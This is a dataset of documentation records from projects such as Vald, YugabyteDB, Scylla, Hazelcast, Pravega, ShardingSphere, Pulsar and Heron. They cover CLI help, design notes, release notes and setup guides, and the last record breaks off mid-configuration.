tag
dict
content
listlengths
1
171
{ "category": "App Definition and Development", "file_name": "template.md", "project_name": "Vald", "subcategory": "Database" }
[ { "data": "<!-- introduction sentence --> `image-name` is the XXX for vald-XXX-YYY. The responsibility of this image is XXX. <!-- FIXME: document URL --> For more details, please refer to the . <div align=\"center\"> <img src=\"https://github.com/vdaas/vald/blob/main/assets/image/readme.svg?raw=true\" width=\"50%\" /> </div> ](https://hub.docker.com/r/vdaas/vald-agent-ngt/tags?page=1&name=latest) ](https://opensource.org/licenses/Apache-2.0) ](https://github.com/vdaas/vald/releases/latest) ](https://twitter.com/vdaas_vald) <!-- FIXME: If image has some requirements, describe here with :warning: emoji --> CPU instruction: requires `AVX2` or `AVX512` RAM: XXX Image: XXX External components: S3 CPU instruction: requires `AVX2` or `AVX512` RAM: XXX Image: XXX External components: S3 This image does NOT support running on M1/M2 Mac. <!-- Get Started --> <!-- Vald Agent NGT requires more chapter Agent Standalone --> `image-name` is used for one of the components of the Vald cluster, which means it should be used on the Kubernetes cluster, not the local environment or Docker. Please refer to the for deploying the Vald cluster. | tag | linux/amd64 | linux/arm64 | description | | : | :: | :: | : | | latest | | | the latest image is the same as the latest version of repository version. | | nightly | | | the nightly applies the main branch's source code of the repository. | | vX.Y.Z | | | the vX.Y.Z image applies the source code of the repository. | | pr-XXX | | | the pr-XXX image applies the source code of the pull request XXX of the repository. | <!-- FIXME --> The `Dockerfile` of this image is . <!-- About Vald Project --> <!-- This chapter is static --> The information about the Vald project, please refer to the following: We're love to support you! Please feel free to contact us anytime with your questions or issue reports. This product is under the terms of the Apache License v2.0; refer file." } ]
{ "category": "App Definition and Development", "file_name": "yba_task_list.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "List YugabyteDB Anywhere tasks List YugabyteDB Anywhere tasks ``` yba task list [flags] ``` ``` --task-uuid string [Optional] UUID of the task. -h, --help help for list ``` ``` -a, --apiToken string YugabyteDB Anywhere api token. --config string Config file, defaults to $HOME/.yba-cli.yaml --debug Use debug mode, same as --logLevel debug. --disable-color Disable colors in output. (default false) -H, --host string YugabyteDB Anywhere Host (default \"http://localhost:9000\") -l, --logLevel string Select the desired log level format. Allowed values: debug, info, warn, error, fatal. (default \"info\") -o, --output string Select the desired output format. Allowed values: table, json, pretty. (default \"table\") --timeout duration Wait command timeout, example: 5m, 1h. (default 168h0m0s) --wait Wait until the task is completed, otherwise it will exit immediately. (default true) ``` - Manage YugabyteDB Anywhere tasks" } ]
{ "category": "App Definition and Development", "file_name": "per-partition-rate-limit.md", "project_name": "Scylla", "subcategory": "Database" }
[ { "data": "Scylla clusters operate best when the data is spread across a large number of small partitions, and reads/writes are spread uniformly across all shards and nodes. Due to various reasons (bugs, malicious end users etc.) this assumption may suddenly not hold anymore and one partition may start getting a disproportionate number of requests. In turn, this usually leads to the owning shards being overloaded - a scenario called \"hot partition\" - and the total cluster latency becoming worse. The per partition rate limit feature allows users to limit the rate of accepted requests on a per-partition basis. When a partition exceeds the configured limit of operations of given type (reads/writes) per second, the cluster will start responding with errors to some of the operations for that partition so that, statistically, the rate of accepted requests is kept at the configured limit. Rejected operations use less resources, therefore this feature can help in the \"hot partition\" situation. NOTE: this is an overload protection mechanism and may not be used to reliably enforce limits in some situations. Due to Scylla's distributed nature, the actual number of accepted requests depends on the cluster and driver configuration and may be larger by a factor of RF (keyspace's replication factor). It is recommended to set the limit to a value an order of magnitude larger than the maximum expected per-partition throughput. See the section for more information. Per-partition limits are set separately for reads and writes, on a per-table basis. Limits can be set with the `perpartitionrate_limit` extension when CREATE'ing or ALTER'ing a table using a schema extension: ```cql ALTER TABLE ks.tbl WITH perpartitionrate_limit = { 'maxreadsper_second': 123, 'maxwritesper_second': 456 }; ``` Both `maxreadspersecond` and `maxwritespersecond` are optional - omitting one of them means \"no limit\" for that type of operation. Rejected operations are reported as an ERROR response to the driver. If the driver supports it, the response contains a scylla-specific error code indicating that the operation was rejected. For more details about the error code, see the section in the `protocol-extensions.md` doc. If the driver doesn't support the new error code, the `Config_error` code is returned instead. The code was chosen in order for the retry policies of the drivers not to retry the requests and instead propagate them directly to the users. Accounting related to tracking per-partition limits is done by replicas. Each replica keeps a map of counters which are identified by a combination of (token, table, operation type). When the replica accounts an operation, it increments the relevant counter. All counters are halved every second. Depending on whether the coordinator is a replica or not, the flow is a bit different. Here, \"coordinator == replica\" requirement also means that the operation is handled on the correct shard. Only reads and writes explicitly issued by the user are counted to the limit. Read repair, hints, batch replay, CDC preimage query and internal system queries are not counted to the limit. Paxos and counters are not covered in current implementation. Coordinator generates a random number from range `[0, 1)` with uniform distribution and sends it to replicas along with the operation request. Each replica accounts the operation and then calculates a rejection threshold based on the local counter" }, { "data": "If the number received from the coordinator is above the threshold, the operation is rejected. The assumption is that all replicas will converge to similar counter values. Most of the time they will agree on the decision and not much work will be wasted due to some replicas accepting and other rejecting. As before, the coordinator generates a random number. However, it does not send requests to replicas immediately but rather calculates local rejection threshold. If the number is above threshold, the whole operation is skipped and the operation is only accounted on the coordinator. Otherwise, coordinator proceeds with sending the requests, and replicas are told only to account the operation but never reject it. This strategy leads to no wasted replica work. However, when the coordinator rejects the operation other replicas do not account it, so it may lead to a bit more requests being accepted (but still not more than `RF * limit`). Let's assume the simplest case where there is only one replica. It will increment its counter on every operation. Because all counters are halved every second, assuming the rate of `V` ops/s the counter will eventually oscillate between `V` and `2V`. If the limit is `L` ops/s, then we would like to admit only `L` operation within each second - therefore the probability should satisfy the following: ``` L = Sum(i = V..2V) { P(i) } ``` This can be approximated with a definite integral: ``` L = Int(x = V..2V) { P(x) } ``` A solution to this integral is: ``` P(x) = L / (x * ln 2) ``` where `x` is the current value of the counter. This is the formula used in the current implementation. In practice, RF is rarely 1 so there is more than one replica. Depending on the type of the operation, this introduces some inaccurracies in counting. Writes are counted relatively well because all live replicas participate in a write operation, so all replicas should have an up-to-date counter value. Because of the \"coordinator is replica\" case, rejected writes will not be accounted on all replicas. In tests, the amount of accepted operations was quite close to the limit and much less than the theoretical `RF * limit`. Reads are less accurate because not all replicas may participate in a given read operation (this depends on CL). In the worst case of CL=ONE and round-robin strategy, up to `RF * limit` ops/s will be accepted. Higher consistencies are counted better, e.g. CL=ALL - although they are also susceptible to the inaccurracy introduced by \"coordinator is replica\" case. In case of non-shard-aware drivers, it is best to keep the clocks in sync. When the coordinator is not a replica, each replica decides whether to accept or not, based on the random number sent by coordinator. If the replicas have their clocks in sync, then their per-partition counters should have close values and they will agree on the decision whether to reject or not most of the time. If not, they will disagree more frequently which will result in wasted replica work and the effective rate limit will be lower or higher, depending on the consistency. In the worst case, it might be 30% lower or 45% higher than the real limit." } ]
{ "category": "App Definition and Development", "file_name": "002-job-level-serialization.md", "project_name": "Hazelcast IMDG", "subcategory": "Database" }
[ { "data": "title: 002 - Job-level Serialization description: Make it possible to add serializer per job Since: 4.1 Be able to run jobs with context scoped custom serializers - in particular it should be possible to configure two different serializers for a given data type on two different jobs. Assuming we want to allow users to add their hand written serializers to a given job we could extend `JobConfig` API: ```java new JobConfig().addSerializer(Value.class, ValueSerializer.class) ``` More complex serializers - i.e. a custom one implementing Avro serialization - might require additional resources, those could be added via existing `add[Class|Jar]`: ```java new JobConfig() .addSerializer(Value.class, ValueSerializer.class) .addJar(\"/file/serialization-library.jar\") ``` All the serialization classes/jars could be then uploaded to jobs `IMap`, similarly to how is it done for other resources via `JobRepository`. That would allow reusing existing class loading mechanism and make sure resources are cleaned up on job completion. Currently all the serializers are registered up front, before cluster startup. Moreover, they are all public scoped - they are accessible for all the jobs running in a given cluster - which forbids different serializers for same data type on a different job. There are couple of ways we could support job level serializers: Extend `SerializationService` to allow runtime registration and de-registration of serializers. Moreover, we would need to add the possibility to lookup serializers not only by class but also by something like a tuple of job id and a class. Duplicate the `SerializationService` for each job. That would also require extending `SerializationService` to allow runtime registration of serializers. However, it lets us use existing serializer lookup mechanism. Create new `SerializationService` with job level only serializers which would fallback to public `SerializationService`. All above require to some extent API changes in IMDG `SerializationService`. Registering serializers in runtime would introduce the possibility to create a simpler `JobLevelSerializer` interface - without the need to declare type id and necessity to manage it. For instance: ```java public interface Codec<T> { void encode(T value, DataOutput output) throws IOException; T decode(DataInput input) throws IOException; } ``` However, that's another interface in already overcrowded universe of Hazelcast serialization interfaces so whether it is valuable or not is questionable. Another thing is that most probably it could not be used to work with data types stored in IMDG. Going with 1. would require changing code in each Jet's `SerializationService` call site - altering not only the way lookup is performed but also making sure job id is available in there. Going with 2. or" }, { "data": "requires spawning a new `SerializationService` per job and hooking it up (at least) in: `SenderTasklet` `ReceiverTasklet` `OutboxImpl` `ExplodeSnapshotP` Each job execution gets its own `SerializationService` which encapsulates job-level serializers and falls back to cluster `SerializationService`. Job-level serializers can be used to read/write data from/to local IMDG `Observable`s, `List`s, `Map`s & `Cache`s. Job-level `SerializationService` serializers have precedence over any cluster serializers - if type `A` have serializers registered on both levels, cluster and job, the latter will be chosen for given job. `JobConfig` has been extended with: ```java / Registers the given serializer for the given class for the scope of the job. It will be accessible to all the code attached to the underlying pipeline or DAG, but not to any other code. (An important example is the {@code IMap} data source, which can instantiate only the classes from the Jet instance's classpath.) <p> Serializers registered on a job level have precedence over any serializer registered on a cluster level. <p> Serializer must have no-arg constructor. * @return {@code this} instance for fluent API @since 4.1 */ @Nonnull @EvolvingApi public <T, S extends StreamSerializer<?>> JobConfig registerSerializer(@Nonnull Class<T> clazz, @Nonnull Class<S> serializerClass) { Preconditions.checkFalse(serializerConfigs.containsKey(clazz.getName()), \"Serializer for \" + clazz + \" already registered\"); serializerConfigs.put(clazz.getName(), serializerClass.getName()); return this; } ``` Given sample value class and its serializer: ```java class Value { public static final int TYPE = 1; private Integer v; public Value(Integer v) { this.v = v; } } class ValueSerializer implements StreamSerializer<Value> { @Override public int getTypeId() { return Value.TYPE; } @Override public void write(ObjectDataOutput objectDataOutput, Value value) throws IOException { objectDataOutput.writeInt(value.v); } @Override public Value read(ObjectDataInput objectDataInput) throws IOException { return new Value(objectDataInput.readInt()); } } ``` one registers them with `JobConfig`, the following way (`registerSerializer()` does not add classes to the classpath, we have other means to do that, see `addClass()`, `addJar()` etc): ```java JobConfig jobConfig = new JobConfig() .addClass(Value.class, ValueSerializer.class) .registerSerializer(Value.class, ValueSerializer.class) ``` Each job execution gets its own job-level `SerializationService`. It would be beneficial to add a soak test to make sure that nothing is leaking when there are thousands of jobs running with job-level serializers. Job-level serializers are used to serialize objects between distributed edges & to/from snapshots. They can also be used to read/write data from/to local IMDG data structures. However, if you want to work with them outside of the job, you have to register compatible serializers on a cluster level as well. Moreover, following functionalities are not currently supported: querying `Map`s (reading from an `IMap` with user defined predicates & projections) merging/updating `Map`s streaming `Journal` data Allow job-level serializers to be used with remote IMDG data structures. Allow job-level serializers to: query `Map`s merge/update `Map`s stream `Journal` data" } ]
{ "category": "App Definition and Development", "file_name": "getting-started.md", "project_name": "Pravega", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Copyright Pravega Authors. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> The best way to get to know Pravega is to start it up and run a sample Pravega application. Verify the following prerequisite ``` Java 11 ``` Download Pravega Download the Pravega release from the . If you prefer to build Pravega yourself, you can download the code and run `./gradlew distribution`. More details are shown in the Pravega . ``` $ tar xfvz pravega-<version>.tgz ``` Run Pravega in standalone mode This launches all the components of Pravega on your local machine. Note: This is for testing/demo purposes only, do not use this mode of deployment in Production! In order to remotely troubleshoot Java application, JDWP port is being used. The default JDWP port in Pravega(8050) can be overridden using the below command before starting Pravega in standalone mode. 0 to 65535 are allowed range of port numbers. ``` $ export JDWP_PORT=8888 ``` More options and additional ways to run Pravega can be found in guide. ``` $ cd pravega-<version> $ ./bin/pravega-standalone ``` The command above runs Pravega locally for development and testing purposes. It does not persist in the storage tiers like we do with a real deployment of Pravega and as such you shouldn't expect it to recover from crashes, and further, not rely on it for production use. For production use, we strongly encourage a full deployment of Pravega. We have developed a few samples to introduce the developer to coding with Pravega here: . Download and run the \"Hello World\" Pravega sample reader and writer applications. Pravega dependencies will be pulled from maven central. Note: The samples can also use a locally compiled version of Pravega. For more information, please see the note on maven publishing. Download the Pravega-Samples git repo ``` $ git clone https://github.com/pravega/pravega-samples $ cd pravega-samples ``` Generate the scripts to run the applications ``` $ ./gradlew installDist ``` Run the sample \"HelloWorldWriter\" This runs a simple Java application that writes a \"hello world\" message as an event into a Pravega stream. ``` $ cd pravega-samples/pravega-client-examples/build/install/pravega-client-examples $ ./bin/helloWorldWriter ``` Example HelloWorldWriter output ``` ... Writing message: 'hello world' with routing-key: 'helloRoutingKey' to stream 'examples / helloStream' ... ``` See the file in the standalone-examples for more details on running the HelloWorldWriter with different parameters. Run the sample \"HelloWorldReader\" ``` $ cd pravega-samples/pravega-client-examples/build/install/pravega-client-examples $ ./bin/helloWorldReader ``` Example HelloWorldReader output ``` ... Reading all the events from examples/helloStream ... Read event 'hello world' No more events from examples/helloStream ... ``` See the file in the pravega-client-examples for more details on running the HelloWorldReader application. Serializers The Java client by has multiple built in serializers: `UTF8StringSerializer`, `ByteArraySerializer`, `ByteBufferSerializer`, and `JavaSerializer`. Additional pre-made serializers are available in: https://github.com/pravega/pravega-serializer You can also write your own implementation of the interface." } ]
{ "category": "App Definition and Development", "file_name": "ss_5.0.0beta.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"Following 6 months of development Apache ShardingSphere 5.0.0-beta has been officially released!\" weight = 14 chapter = true +++ As an Apache top-level project, ShardingSphere goes through community verification, voting and many other steps before it can be released. Such steps ensure the release is compliant with the Apache Release License specifications, and meeting the users expectations set for the 5.0.0-beta milestone. The current versions architecture has been completed and the version is officially available. SQL is a database query programming language for accessing, querying, updating, and managing relational database systems. Most of the existing general database systems tend to rewrite and extend SQL to better fit their own database system with higher flexibility and functionality. DistSQL (Distributed SQL) is a special built-in language proposed by Apache ShardingSphere providing additional functional operation capability in comparison to the standard SQL. Users can use ShardingSphere just like other database systems with DistSQL, therefore no longer positioning ShardingSphere as a middleware architecture for programmers, but also making it transferable to an infrastructure product for operation and maintenance. ShardingSphere currently includes three types of DistSQL including RDL, RQL and RAL: RDL (Resource & Rule Definition Language): create, modify and delete resources and rules. RQL (Resource & Rule Query Language): query and show resources and rules. RAL (Resource & Rule Administration Language): hint, distributed transaction switching, distributed query execution plan and other incremental functions. ShardingSphere proposes the concept of Database Plus, empowering traditional databases to build a highly secure & enhanced distributed database ecosystem, by leveraging open-source database system software such as MySQL and PostgreSQL, while at the same time meeting practical business needs. The distributed SQL used with this distributed database system converts ShardingSphere-Proxy from a YAML configuration driven middleware to a SQL driven distributed database system. In the 5.0.0-beta, users can easily initiate ShardingSphere-Proxy and use DistSQL to dynamically create, modify, delete sharding tables, encrypt tables, and dynamically inject instances of database resources, create read-write-splitting strategies, show all the configurations and distributed transaction types, engage in dynamic migration of distributed database tables etc. DistSQL allows users to query and manage all database resources and ShardingSpheres distributed metadata in a standardized and familiar way. In the future DistSQL will further redefine the boundary between Middleware and database, allowing users to leverage ShardingSphere as if they were using a database natively. PostgreSQL is widely considered to be the most powerful enterprise-level open-source database. ShardingSphere clients include ShardingSphere-JDBC and ShardingSphere-Proxy, with ShardingSphere-Proxy containing both MySQL and PostgreSQL. As PostgreSQL has greatly matured and become increasingly adopted, the ShardingSphere team has directed its attention to the PostgreSQL proxy. This release has greatly improved PostgreSQL in its SQL parsing and compatibility layers, protocol access and permission control layers. The improved version of ShardingSphere-Proxy PostgreSQL is this releases main feature and will be continuously improved in the future as it marks the beginning of compatibility with the open-source" }, { "data": "In the future, ShardingSphere PostgreSQL-Proxy will not only provide sharding and security distributed solutions to users, but also fine-grained authentication, data access control etc. Pluggable architecture pursues the independence and non-awareness of each module through a highly flexible, pluggable and extensible kernel. These functions are combined in a super positional manner. In ShardingSphere, many functional implementation classes are loaded by inserting SPIs (Service Provider Interface). SPI APIs for third party implementation or extension, can be used for architecture extension or component substitution. Currently data sharding, Readwrite-splitting, data encryption, Shadow databases, instance exploration and other functions including the protocol implementations of MySQL, PostgreSQL, SQLServer, Oracle and other SQL and protocol support can be installed into ShardingSphere as plug-ins. ShardingSphere now offers dozens of SPIs as extension points for the system, and the number is still growing. Pluggable architectures improvement effectively evolves ShardingSphere into a distributed database ecosystem. The pluggable and extensible concepts provide a customized combinational database solution that can be built upon with Lego-like blocks. For example, traditional relational databases can be scaled out and encrypted at the same time, while distributed database solutions can be built independently. ShardingSphere provides automated probes to effectively separate observability from the main functionality. This brings significant convenience for user-customized tracing, metrics, and logging. OpenTracing, Jaeger, Zipkin based tracing probes and Prometheus Metrics probes, as well as a default logging implementation also have built-in implementations. Join and sub queries for cross-database instances are some of the most cumbersome issues. Using traditional database middleware could limit business level functionality - therefore SQLs application scope needs to be considered by R&D personnel. This release enhances distributed query functionality which supports join queries and sub-queries across different database instances. At the same time it greatly improves compatibility between supported SQL cases for MySQL/PostgreSQL/Oracle/SQLServer in distributed scenarios through SQL parsing, routing, and execution level enhancements and bug fixing. The improvements in this release allow users to achieve a smooth transition from a traditional database cluster to a distributed database cluster with low risk, high efficiency and zero transformation by introducing ShardingSphere. Currently, distributed query capability enhancement is still in the POC stage, with room for improvement in terms of performance. The community is warmly encouraged to participate in the co-development. User security and permission control some of the most important functions in a database field. Although simple password setting and database-level access control at the library level were already provided in the 5.0.0-alpha, these features have now been further upgraded. This update changes the password setting from using configuration file to using standard SQL online to create and update distributed users and their access permissions. Whether you were using MySQL, PostgreSQL or OpenGauss in your business scenario, you can continue to use your native database SQL dialect. Username, hostname, password, library, table and other free combination of authority control management can be used in ShardingSpheres distributed system. ShardingSphere-Proxy's Proxy access mode enables users to migrate their original database permissions and user systems" }, { "data": "In future releases, access control at the column level, view level, and even the possibility for functions to limit access for each row of data will be provided. ShardingSphere also provides access to third-party business systems or user-specific security systems, allowing ShardingSphere-Proxy to connect with third-party security control systems and provide the most standard database access management mode. The permission module is currently in the development stage, and the finalized functions will be presented in the next version. ShardingSphere's pluggable architecture provides users with rich scalable capabilities with common functions already built-in, to increase ease of use. For example, database and table sharding strategy is preset with hash sharding, time range sharding, module sharding and other strategies. Data encryption is preset with AES, RC4, MD5 encryption. To further simplify operation, powerful new distSQL capability allows users to dynamically create a sharded or encrypted table online with a single SQL. To satisfy more complex scenarios, ShardingSphere also provides the strategy interfaces for related algorithms allowing users to implement more complicated functionalities for their own business scenarios. The coexistence philosophy of built-in strategies for users general needs, and specific scenarios corresponding interfaces has always been the architectural design philosophy of ShardingSphere. Startup time issues could be encountered when launching ShardingSpheres previous versions, especially in the occurrence involving thousands of servers - since ShardingSphere helps users manage all database instances and metadata information. With this release, significant performance tuning and several architectural tweaks are introduced to specifically address the community's metadata loading issues. Differently from the original JDBC driver loading mode, the parallel SQL query mode for different database dialects takes out all metadata information at a single time, thus greatly improving startup performance. In the process of constantly improving and developing new functions, ShardingSphere had previously lacked a complete and comprehensive integration & performance testing system, which can ensure that every commit be compiled normally without affecting other modules and can observe upward and downward performance trends. With this release, integration tests have also been included to ensure data sharding, data encryption, Readwrite-splitting, distributed management and control, access control, SQL support and other functions. The system provides basic guarantees for monitoring and tuning performance across databases, different sharding or encryption strategies, and different versions. With this release, relevant performance test reports and dashboard will also be developed for the community, allowing users to observe ShardingSpheres performance changes. The entire test system source code will be made available to the community to facilitate user test deployment. In addition to above mentioned features, for a comprehensive list of enhancements, performance optimizations, bug fixes etc. please refer to the list below: New DistSQL for loading and presenting ShardingSpheres configuration. Support for join queries and sub-queries across different databased instances. Data gateway is added to support heterogeneous databases. Support create and modify user permission online or dynamically. New automated probes module. API in read and write splitting module configuration changed to read-write-splitting. API for ShardingProxy user permission configuration changed to" }, { "data": "Using dataSourceClassName to optimize the dataSource configuration of ShardingJDBC. Automated ShardingTable configuration strategy, provide standard built-in shard table. Removed ShardingProxy acceptor-size configuration option. Added built-in shard algorithm SPI so users can set up the shard algorithm through class name like in the version 4.x. Startup metadata loading performance has been significantly improved. Greatly enhanced the parsing abilities for Oracle/SQLServer/PostgreSQL database. Supporting initialization of the user permission MySQL/PostgreSQL/SQLServer/Oracle. Supporting DDL language for data encryption. When sharding and encryption are used together, SQL is supported for modifying the table named owner. Using SELECT* to rewrite SQL, overwrite columns to add escape characters to avoid column conflicts with keywords. Supporting PostgreSQL JSON/JSONB/ for pattern matching operator parsing. Supporting MySQL/PostgreSQL CREATE/ALTER/DROP TABLESPACE. Supporting PostgreSQL PREPARE, EXECUTE, DEALLOCATE. Supporting PostgreSQL EXPLAIN. Supporting PostgreSQL START/END TRANSACTION. Supporting PostgreSQL ALTER/DROP INDEX. Supporting PostgreSQL dialect CREATE TABLESPACE. Supporting MySQL CREATE LOADABLE FUNCTION. Supporting MySQL/PostgreSQL ALTER TABLE RENAME. Supporting PostgreSQL protocol Close command. New registry storage structure. Removed support for NACOS and Apollo's Configuration Centre. ShardingScaling introduces ElasticJob to handle migration tasks. Refactoring the storage and online update of the kernel metadata information. Fixed issue where SELECT * wildcard SQL could not be used for read/write separation. The custom sharding algorithm did not match the configuration type and the class instance did not meet expectations issue is fixed. Fixed the NoSuchTableException when executing DROP TABLE IF EXISTS. Fixed UPDATE ... SET ... rewrite error. Fixed CREATE/ALTER TABLE statement using foreign key to reference TABLE overwrite error. Fixed the issue when querying subqueries in the temporal table field verification exception. Fixed Oracle/SQL92 SELECT ... WHERE ... LIKE class cast exception. Fixed MySQL SELECT EXISTS ... FROM ... parsing exception. Fixed SHOW INDEX result exception. Fixed the rewrite and merge result exception for SELECT... GROUP BY ... Fixed the encryption and decryption error for CREATE TABLE rewrite. Fixed issue with PostgreSQL Proxy reading text parameter values incorrectly. Fixed PostgreSQL Proxy support for array objects. Fixed ShardingProxy Datatype conversion issues. PostgreSQL Proxy supports the use of the Numeric type. Fixed the issue with incorrect Tag for PostgreSQL Proxy transactions related to Command Complete. Fixed the issue that might return packets that were not expected by the client. Download Link: <https://shardingsphere.apache.org/document/current/en/downloads/> Update Logs: <https://github.com/apache/shardingsphere/blob/master/RELEASE-NOTES.md> Project Address: <https://shardingsphere.apache.org/> Mailing List: <https://shardingsphere.apache.org/community/en/involved/subscribe/> The release of Apache ShardingSphere 5.0.0-beta could not have happened without the outstanding support and contribution of the community. Since the 5.0.0-alpha release until now, 41 contributors have contributed 1574 PR, enhanced the optimization, iteration, and the release of ShardingSphere 5.0.0. Pan Juan | Trista SphereEx co-founder, Apache member, Apache ShardingSphere PMC, Apache brpc (Incubating) mentor, Release manager. Senior DBA at JD Technology, she was responsible for the design and development of JD Digital Science and Technology's intelligent database platform. She now focuses on distributed database & middleware ecosystem, and the open-source community. Recipient of the \"2020 China Open-Source Pioneer\" award, she is frequently invited to speak and share her insights at relevant conferences in the fields of database & database architecture. GitHub: <https://tristazero.github.io>" } ]
{ "category": "App Definition and Development", "file_name": "yba.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "yba - Command line tools to manage your YugabyteDB Anywhere (Self-managed Database-as-a-Service) resources. YugabyteDB Anywhere is a control plane for managing YugabyteDB universes across hybrid and multi-cloud environments, and provides automation and orchestration capabilities. YugabyteDB Anywhere CLI provides ease of access via the command line. ``` yba [flags] ``` ``` -a, --apiToken string YugabyteDB Anywhere api token. --config string Config file, defaults to $HOME/.yba-cli.yaml --debug Use debug mode, same as --logLevel debug. --disable-color Disable colors in output. (default false) -h, --help help for yba -H, --host string YugabyteDB Anywhere Host (default \"http://localhost:9000\") -l, --logLevel string Select the desired log level format. Allowed values: debug, info, warn, error, fatal. (default \"info\") -o, --output string Select the desired output format. Allowed values: table, json, pretty. (default \"table\") --timeout duration Wait command timeout, example: 5m, 1h. (default 168h0m0s) --wait Wait until the task is completed, otherwise it will exit immediately. (default true) ``` - Authenticate yba cli - Manage YugabyteDB Anywhere backups - Generate the autocompletion script for the specified shell - Authenticate yba cli using email and password - Manage YugabyteDB Anywhere providers - Register a YugabyteDB Anywhere customer using yba cli - Manage YugabyteDB Anywhere storage configurations - Manage YugabyteDB Anywhere tasks - Manage YugabyteDB Anywhere universes - Manage YugabyteDB version release" } ]
{ "category": "App Definition and Development", "file_name": "pip-276.md", "project_name": "Pulsar", "subcategory": "Streaming & Messaging" }
[ { "data": "The metrics are all started with `pulsar_`, so that both users and operators can quickly find the metrics of the entire system through this prefix. However, due to some other reasons, it was found that `topicloadtimes` was missing the prefix, so want to get it right. In master branch, keep the old metric `topicloadtimes` and add below new metrics: `pulsartopicload_times` After release-3.1.0, remove ``topicloadtimes`. Add new metrics: `pulsartopicload_times` : The topic load latency calculated in milliseconds After this PIP, users can use `topicloadtimes` and `pulsartopicload_times` to monitor topic load times. <!-- Updated afterwards --> Mailing List discussion thread: https://lists.apache.org/thread/fcg3f5mm2640fxq4cj8pz6n3lso293f8 Mailing List voting thread: https://lists.apache.org/thread/vky6jcn0llx56599fgo73dh6cxfpmxsm" } ]
{ "category": "App Definition and Development", "file_name": "mix.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"Mixed Rules\" weight = 10 +++ ShardingSphere provides a variety of features, such as data sharding, read/write splitting, and data encryption. These features can be used independently or in combination. Below, you will find the parameters' explanation and configuration samples based on YAML. ```yaml rules: !SHARDING tables: <logictablename>: # Logical table name: actualDataNodes: # consists of logical data source name plus table name (refer to Inline syntax rules) tableStrategy: # Table shards strategy. The same as database shards strategy standard: shardingColumn: # Sharding column name shardingAlgorithmName: # Sharding algorithm name keyGenerateStrategy: column: # Auto-increment column name. By default, the auto-increment primary key generator is not used. keyGeneratorName: # Distributed sequence algorithm name defaultDatabaseStrategy: standard: shardingColumn: # Sharding column name shardingAlgorithmName: # Sharding algorithm name shardingAlgorithms: <shardingalgorithmname>: # Sharding algorithm name type: INLINE props: algorithm-expression: # INLINE expression torderinline: type: INLINE props: algorithm-expression: # INLINE expression keyGenerators: <keygeneratealgorithm_name> (+): # Distributed sequence algorithm name type: # Distributed sequence algorithm type props: # Property configuration of distributed sequence algorithm !ENCRYPT encryptors: <encryptalgorithmname> (+): # Encryption and decryption algorithm name type: # Encryption and decryption algorithm type props: # Encryption and decryption algorithm property configuration <encryptalgorithmname> (+): # Encryption and decryption algorithm name type: # Encryption and decryption algorithm type tables: <table_name>: # Encryption table name columns: <column_name> (+): # Encrypt logic column name cipher: name: # Cipher column name encryptorName: # Cipher encrypt algorithm name assistedQuery (?): name: # Assisted query column name encryptorName: # Assisted query encrypt algorithm name likeQuery (?): name: # Like query column name encryptorName: # Like query encrypt algorithm name ``` ```yaml rules: !SHARDING tables: t_order: actualDataNodes: replicads${0..1}.torder${0..1} tableStrategy: standard: shardingColumn: order_id shardingAlgorithmName: torderinline keyGenerateStrategy: column: order_id keyGeneratorName: snowflake defaultDatabaseStrategy: standard: shardingColumn: user_id shardingAlgorithmName: database_inline shardingAlgorithms: database_inline: type: INLINE props: algorithm-expression: replicads${user_id % 2} torderinline: type: INLINE props: algorithm-expression: torder${order_id % 2} torderitem_inline: type: INLINE props: algorithm-expression: torderitem${orderid % 2} keyGenerators: snowflake: type: SNOWFLAKE !ENCRYPT encryptors: aes_encryptor: type: AES props: aes-key-value: 123456abc assisted_encryptor: type: MD5 like_encryptor: type: CHARDIGESTLIKE tables: t_encrypt: columns: user_id: cipher: name: user_cipher encryptorName: aes_encryptor assistedQuery: name: assistedqueryuser encryptorName: assisted_encryptor likeQuery: name: likequeryuser encryptorName: like_encryptor order_id: cipher: name: order_cipher encryptorName: aes_encryptor ```" } ]
{ "category": "App Definition and Development", "file_name": "schedulers-local.md", "project_name": "Apache Heron", "subcategory": "Streaming & Messaging" }
[ { "data": "id: version-0.20.0-incubating-schedulers-local title: Local Cluster sidebar_label: Local Cluster original_id: schedulers-local <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> In addition to out-of-the-box schedulers for , Heron can also be deployed in a local environment, which stands up a mock Heron cluster on a single machine. This can be useful for experimenting with Heron's features, testing a wide variety of possible cluster events, and so on. One of two state managers can be used for coordination when deploying locally: Note: Deploying a Heron cluster locally is not to be confused with Heron's . Simulator mode enables you to run topologies in a cluster-agnostic JVM process for the purpose of development and debugging, while the local scheduler stands up a Heron cluster on a single machine. Using the local scheduler is similar to deploying Heron on other schedulers. The cli is used to deploy and manage topologies as would be done using a distributed scheduler. The main difference is in the configuration. To configure Heron to use local scheduler, specify the following in `scheduler.yaml` config file. `heron.class.scheduler` Indicates the class to be loaded for local scheduler. Set this to `org.apache.heron.scheduler.local.LocalScheduler` `heron.class.launcher` Specifies the class to be loaded for launching topologies. Set this to `org.apache.heron.scheduler.local.LocalLauncher` `heron.scheduler.local.working.directory` Provides the working directory for topology. The working directory is essentially a scratch pad where topology jars, heron core release binaries, topology logs, etc are generated and kept. `heron.package.core.uri` Indicates the location of the heron core binary package. The local scheduler uses this URI to download the core package to the working directory. `heron.directory.sandbox.java.home` Specifies the java home to be used when running topologies in the containers. Set to `${JAVA_HOME}` to use the value set in the bash environment variable $JAVA_HOME. ```yaml 